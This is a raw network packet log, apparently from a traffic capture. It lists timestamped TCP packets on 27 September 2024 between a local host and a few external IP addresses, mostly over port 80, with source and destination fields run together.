                                                                          Sep 27, 2024 04:21:15.753849983 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753870010 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753894091 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753906965 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753911972 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753942013 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753972054 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753988981 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754000902 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754010916 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754021883 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754056931 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.754093885 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.754131079 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754144907 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754156113 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754168034 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754179001 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754185915 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.754188061 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754223108 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.754266977 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.754368067 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754376888 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754386902 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754424095 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.754447937 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.754450083 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754467010 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754478931 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754487038 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754496098 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754503012 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.754534006 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.754534006 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.754560947 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.754565954 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754579067 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754587889 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754622936 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.754645109 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.754651070 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754662991 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754673004 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.754700899 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.754730940 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.755064964 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.755074978 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.755117893 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.769057035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.769073009 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.769084930 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.769120932 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.769161940 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.769162893 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.769176006 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.769186974 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.769198895 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.769211054 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.769217968 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.769292116 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.769303083 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.769314051 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.769325018 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.769326925 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.769326925 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.769335985 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.769380093 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.769380093 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.769396067 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.769478083 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.769489050 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.769535065 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.774880886 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.774903059 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.774914980 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.774924994 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.774939060 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.774947882 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.774962902 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.774962902 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.775022030 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.775047064 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.775058031 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.775068998 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.775101900 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.775114059 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.775126934 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.775136948 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.775147915 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.775160074 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.775170088 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.775191069 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.775191069 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.775219917 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.775379896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.775413990 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.775424957 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.775449991 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.775449991 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.775470018 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.775480032 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.775491953 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.775502920 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.775547981 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.775547981 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.776402950 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776453018 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.776454926 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776467085 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776505947 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776516914 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776546001 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.776546001 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.776571989 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776583910 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776607037 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776618004 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776643038 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.776643038 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.776680946 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.776721001 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776731968 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776741982 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776753902 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776766062 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776772022 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.776778936 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776804924 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.776817083 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.776819944 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776849031 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776859045 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776863098 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.776863098 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.776899099 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776906967 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.776918888 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776932001 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776942968 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776942968 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.776942968 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.776971102 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.776982069 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777009010 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777015924 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777015924 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777064085 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777076006 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777086973 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777101994 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777101994 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777115107 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777146101 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777173996 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777175903 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777189016 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777200937 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777229071 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777250051 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777309895 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777321100 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777331114 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777342081 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777359009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777379036 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777379036 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777396917 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777405977 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777417898 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777468920 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777482033 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777494907 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777533054 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777569056 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777580023 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777590036 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777600050 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777611971 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777623892 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777637005 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777637005 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777712107 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777717113 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777729988 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777743101 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777754068 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777762890 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777793884 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777793884 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777841091 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777854919 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777864933 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777875900 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777884007 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777884007 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777889013 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777905941 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777916908 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.777951002 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.777951002 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.778050900 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778060913 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778072119 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778084993 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778098106 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778109074 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778120041 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778126001 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.778126001 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.778145075 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.778187037 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.778220892 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778237104 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778248072 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778259993 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778270960 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778285980 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.778306961 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.778318882 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778331041 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778357983 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.778357983 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.778443098 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778459072 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778469086 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778479099 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778489113 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778500080 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778515100 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.778515100 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.778546095 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.778549910 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778563023 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.778611898 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.778611898 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.790271044 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.790282965 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.790304899 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.790338993 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.790344954 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.790359020 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.790370941 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.790388107 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.790389061 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.790389061 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.790443897 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.790443897 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.790533066 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.790544987 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.790555954 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.790565968 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.790575981 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.790587902 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.790599108 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.790605068 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.790646076 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.790646076 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.797115088 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.797127008 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.797137022 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.797173977 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.797197104 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.797200918 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.797209024 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.797221899 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.797260046 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.797260046 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.800492048 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.800549030 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.800556898 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.800573111 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.800590992 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.800602913 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.800609112 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.800615072 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.800627947 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.800632000 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.800649881 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.800652981 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.800677061 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.800703049 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.808806896 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:15.823726892 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.823741913 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.823760033 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.823771000 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.823781967 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.823792934 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.823797941 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.823808908 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.823836088 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.823888063 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.830434084 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:15.830542088 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:15.831739902 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:15.835701942 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.835733891 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.835746050 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.835792065 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.835803032 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.835813999 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.835814953 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.835814953 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.835827112 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.835845947 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.835846901 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.835897923 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.835901022 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.835912943 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.835922956 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.835952044 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.835979939 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.835987091 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.835997105 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.836008072 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.836055994 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.836055994 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.836074114 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.836086035 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.836168051 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.836522102 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:15.836858988 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.836931944 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.836934090 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.836946011 CEST8049725185.215.113.117192.168.2.5
